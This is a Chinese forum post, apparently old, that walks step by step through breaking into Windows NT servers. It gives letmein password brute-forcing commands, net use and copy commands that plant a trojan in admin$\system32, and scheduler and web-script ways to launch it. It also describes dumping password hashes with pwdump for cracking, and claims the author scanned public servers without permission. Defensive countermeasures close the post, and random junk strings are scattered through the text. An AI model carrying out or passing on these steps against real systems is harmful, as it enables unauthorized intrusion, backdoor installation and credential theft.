看了篇文章介紹使用netbus 或 netspy 遠程入侵nt系統(tǒng),感覺真是。。看來nt系統(tǒng)的共享機制如果不配合火墻使用,SMB會給你造成很大麻煩。。 連小小 只的木馬都可以讓nt管理員頭大。 ; J7 ?+ W3 ]) D7 F
其攻擊過程如下: & ^3 _9 d0 }# u6 E
1、使用掃描工具查找NT主機 , G! ~% Z. P# ` V { G
2 、確定攻擊目標后,使用letmein 對目標主機進行攻擊, 如: % Z4 P5 [' {9 n: Z
letmein file://x.x.x.x/ -all -g mypwd (對\\x.x.x.x上所有用戶攻擊) * E4 D7 p: [2 d+ U z5 ]% p2 A
letmein file://x.x.x.x/ -admin -g mypwd (對\\x.x.x.x上管理員攻擊) 8 i3 C3 `% a! _5 e* t
letmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
4 _9 @: }* c* I& c# I. l3 `* C) o注:- 確定目標后,收集目標信息并嘗試取得非法資源
0 G2 m& i, H. r! X, W3、當letmein 獲取相關管理員權限后,使用ms提供的合法命令:
0 K+ s( [; [0 T( i. J, @net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠程資源并將木馬拷入遠程
, `5 P. x* |) t9 P- A1 ccopy x:\netserver.exe \\x.x.x.x\admin$\system32
3 ]( d( }1 S" e3 u4、使用合法ms命令遠程啟動木馬服務:
- c5 a. S. z/ ]4 n+ z2 C1 ?netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 3 K$ N! I& I; g/ {* [' ^( n
6 t! [# i# t0 D4 }* E 該方法有其巧妙之處。。利用nt的任務計劃管理,在特定時候啟動木馬服務
: j+ n% c- m: b5 }: P
% I; I1 m" ]3 N3 ~ 另一種方法:
4 c6 x7 y; h5 s' _; c 將ntsrver.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務將被啟動
0 V1 J1 b. J* o3 h' o& e" e2 L4 q$ O7 c; ?& Z; |4 }+ ]
到此,該次攻擊可以算成功了,遠程資源已在別人控制下。
; m% t! r( } a7 ~* E 如果在遠程使用app redirect 啟動一個cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠程資源 。比如:使用pwdump 將遠程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運算。 分析該次攻擊的整體過程,不難看出,關鍵步驟是letmein取得admin權限,但是很不幸,就目前廈門(有些是省內)的nt服務器管理員而言,密碼對letmein只是多花幾分鐘而已。我對某些大的公共平臺服務器進行掃描的結果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進入的機器上,SMB都有在tcp/ip上 跑,有兩臺有配備火墻,但是沒有封閉對外137-139口。 3 S0 @; j! U+ g' H! `. g- k4 n% ^( V
1 \1 \# U+ S. `5 D, u 對策: " f" h' X# g- z8 N
1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會讓任何使用 暴力法計算的機器算到cpu燒掉。
0 p$ d) b6 f7 q) u3 @% ]8 A. E2、nt網絡的適當配置,不要在對外的nc綁定共享服務是個好習慣,特別是tcp/ip協(xié)議。 " |9 d5 T+ ?0 E' v' u
3、防火墻的配置,屏蔽一切不需要的服務端口,象netebui在tcp/ip上的137-139口,開這些口只會使你的系統(tǒng)處于危險的處境,如果非要在遠程使用這些口的服務,建議使用其他軟件來代替。
5 q$ `/ x, V2 ^9 T* C% M4 w4、及時檢查日記和監(jiān)控服務的運行,定時對文件系統(tǒng)的權限受托關系進行檢查。 8 T% x; _0 ~- n
5、管理人員素質的提高,安全風險意思加強無疑對你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時不刻在影響著你 。' Q& h6 `$ Z- I* ~7 f; E, i5 E
|